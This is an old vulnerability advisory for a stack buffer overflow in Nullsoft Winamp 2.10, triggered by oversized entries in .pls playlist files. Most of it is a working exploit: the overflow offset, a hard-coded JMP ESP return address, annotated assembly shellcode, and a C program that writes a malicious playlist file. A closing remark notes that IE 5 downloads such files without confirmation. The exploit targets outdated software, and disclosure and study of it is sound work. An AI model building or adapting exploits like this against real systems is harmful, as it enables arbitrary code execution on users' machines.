COMMAND

    Winamp

SYSTEMS AFFECTED

    Nullsoft Winamp 2.10

PROBLEM

    Steve Fewer found the following.  He recently uncovered a stack-based
    buffer overflow in winamp version 2.10 which lets him execute
    'arbitrary code'.  It is carried out through .pls files, which
    winamp uses for playlists.  This is unnerving, as it is a feasible
    plan to trade playlists on irc during an mp3 trading session with
    someone.

    The overflow occurs when an entry greater than 580 bytes is read
    in from a .pls file.  Of the registers, only EIP is overwritten, by
    the four bytes that follow the first 580; from there on is space for
    your shell code. eg.

        [playlist]
        File1=<580 bytes><eip><shell code>
        NumberOfEntries=1

    The first 580 bytes get mangled around in memory, but the 585th byte
    (where our shell code starts) is pointed to by ESP, therefore a
    simple 'JMP ESP' or the like will land us back in our shell code.
    Steve used a 'JMP ESP' at address 0xBFB9CFF7 in comctl32.dll, which
    winamp loads.  Pointing our EIP at that address lands us back where
    we want to be.

    This  was  all  created/tested  on  Windows 98 [Version 4.10.1998]
    running on an Intel PII400 with 128MB RAM.

    What about shell code?  The shell code Steve wrote for this simply
    displays a message box and then calls exit().  However, Winamp
    doesn't load msvcrt.dll, which is needed to call exit(), so we have
    to load it ourselves.  Steve used the address 0xBFF776D4 in
    kernel32.dll (v4.10.1998) for LoadLibraryA().  For calling
    MessageBox he used the address 0xBFF5412E in user32.dll
    (v4.10.1998), and for calling exit() he used the address 0x78005504
    in msvcrt.dll (v6.00.8397.0).  It didn't warrant using
    GetProcAddress for compatibility's sake.  For the opcodes see the
    exploit further on.

       // Shell code from the advisory, shown as the three stages described in
       // the text above.  Each stage opens its own frame (push ebp / mov ebp,esp)
       // and builds its string argument on the stack one byte at a time, so
       // every [ebp-XXh] offset below depends on the exact push order; the
       // instructions must not be reordered.  No stage restores ebp or returns:
       // the next stage simply opens a new frame below the previous one.
       // All three API addresses are hard-coded for the Windows 98 (4.10.1998)
       // builds named in the text above; nothing here resolves imports
       // dynamically, so the payload is specific to those exact builds.
       // This loads msvcrt.dll
       push ebp
       mov ebp,esp                      // new frame; ebp = esp
       xor eax,eax
       push eax                         // [ebp-04h] = 0
       push eax                         // [ebp-08h] = 0
       push eax                         // [ebp-0Ch] = 0 -> 12 zeroed bytes for the name
       mov byte ptr[ebp-0Ch],4Dh        // 'M'
       mov byte ptr[ebp-0Bh],53h        // 'S'
       mov byte ptr[ebp-0Ah],56h        // 'V'
       mov byte ptr[ebp-09h],43h        // 'C'
       mov byte ptr[ebp-08h],52h        // 'R'
       mov byte ptr[ebp-07h],54h        // 'T'
       mov byte ptr[ebp-06h],2Eh        // '.'
       mov byte ptr[ebp-05h],44h        // 'D'
       mov byte ptr[ebp-04h],4Ch        // 'L'
       mov byte ptr[ebp-03h],4Ch        // 'L' -> "MSVCRT.DLL"; [ebp-02h] is still 0 and terminates it
       mov edx,0xBFF776D4               // LoadLibraryA (kernel32.dll v4.10.1998, per the text above)
       push edx                         // [ebp-10h] = function pointer
       lea eax,[ebp-0Ch]
       push eax                         // arg: lpLibFileName = "MSVCRT.DLL"
       call dword ptr[ebp-10h]          // LoadLibraryA("MSVCRT.DLL")
       // This calls MessageBox to say 'Hi!'
       push ebp
       mov ebp,esp                      // second frame
       xor edi,edi                      // edi = 0, reused as the NULL/zero arguments below
       push edi                         // [ebp-04h] = 0 -> 4 zeroed bytes for the text
       mov byte ptr[ebp-04h],48h        // 'H'
       mov byte ptr[ebp-03h],69h        // 'i'
       mov byte ptr[ebp-02h],21h        // '!' -> "Hi!"; [ebp-01h] stays 0 as the terminator
       mov edx, 0xBFF5412E              // MessageBox (user32.dll v4.10.1998, per the text above)
       push edx                         // [ebp-08h] = function pointer
       push edi                         // uType = 0
       lea edx,[ebp-04h]
       push edx                         // lpCaption = "Hi!"
       push edx                         // lpText = "Hi!"
       push edi                         // hWnd = NULL
       call dword ptr[ebp-08h]          // MessageBox(NULL, "Hi!", "Hi!", 0)
       // This calls exit()
       push ebp
       mov ebp,esp                      // third frame
       mov edx,0xFFFFFFFF
       sub edx,0x87FFAAFB               // edx = 0x78005504 (exit in msvcrt.dll v6.00.8397.0);
                                        // presumably computed rather than loaded directly
                                        // because the immediate 0x78005504 contains a 0x00 byte
       push edx                         // [ebp-04h] = function pointer
       xor eax,eax
       push eax                         // exit status 0
       call dword ptr[ebp-04h]          // exit(0); no epilogue follows, none is needed if exit() does not return

    The exploit:

    /* Stack based buffer overflow exploit for Winamp v2.10
     * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
     *
     * For a detailed description of the exploit see my advisory.
     *
     * Tested with Winamp v2.10 using Windows98 on an Intel
     * PII 400 with 128MB RAM
     *
     * http://indigo.ie/~lmf
     */

    #include <stdio.h>

    /*
     * Proof-of-concept generator: writes crAsh.pls, a playlist whose single
     * File1= entry is laid out as <580-byte NOP sled><return address><shell code>,
     * the layout described in the advisory text above.
     * The return address 0xBFB9CFF7 and the API addresses embedded in the
     * shell code are build-specific (Windows 98 4.10.1998 / Winamp 2.10, per
     * the advisory), so the file is inert against other builds.
     * Returns 0 after writing the file; no error is reported on failure.
     */
    int main()
    {

        printf("\n\n\t\t.......................................\n");
        printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
        printf("\t\t.......................................\n");
        printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
        printf("\t\t.........http://indigo.ie/~lmf.........\n");
        printf("\t\t.......................................\n\n");

    char buffer[640];                    /* NOP sled; only the first 580 bytes are ever written */
    char eip[8] = "\xF7\xCF\xB9\xBF";    /* 0xBFB9CFF7 little-endian (the JMP ESP in comctl32.dll);
                                            bytes 4..7 are zero, so "%s" emits exactly four bytes */
    /* Machine code of the three-stage shell code listed in the advisory
     * (LoadLibraryA, MessageBox, exit).
     * NOTE(review): as printed, the literal is broken across lines with no
     * backslash continuation or adjacent-string concatenation, so it will not
     * compile verbatim -- presumably wrapped by the advisory formatter.
     * Declarations after statements and the for-loop declaration also
     * require C99. */
    char sploit[256] =
    "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
    \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6
    \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50
    \xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21
    \xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF
    \xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

    FILE *file;

        for(int x=0;x<580;x++)
        {
        buffer[x] = 0x90;                /* 0x90 = NOP */
        }

    /* NOTE(review): buffer is never NUL-terminated, so the "%s" below prints
     * past the 580 NOPs into uninitialized stack memory until a zero byte
     * happens to be found -- undefined behaviour, and the sled length in the
     * output file is not guaranteed to be exactly 580. */
    file = fopen("crAsh.pls","wb");      /* return value unchecked: a NULL here goes straight to fprintf */

    fprintf(file, "[playlist]\n");
    fprintf(file, "File1=");
    fprintf(file, "%s", buffer);         /* sled (see note above) */
    fprintf(file, "%s", eip);            /* 4-byte return address */
    fprintf(file, "%s", sploit);         /* shell code; any 0x00 byte would truncate it here */
    fprintf(file, "\nNumberOfEntries=1");

    fclose(file);
    printf("\t     created file crAsh.pls loaded with the exploit.\n");
    return 0;
    }

    Vladimir Dubrovin added: if WinAMP is installed, IE 5 downloads .pls
    files without user confirmation.

SOLUTION

    Vladimir Dubrovin found WinAMP 2.5E isn't vulnerable.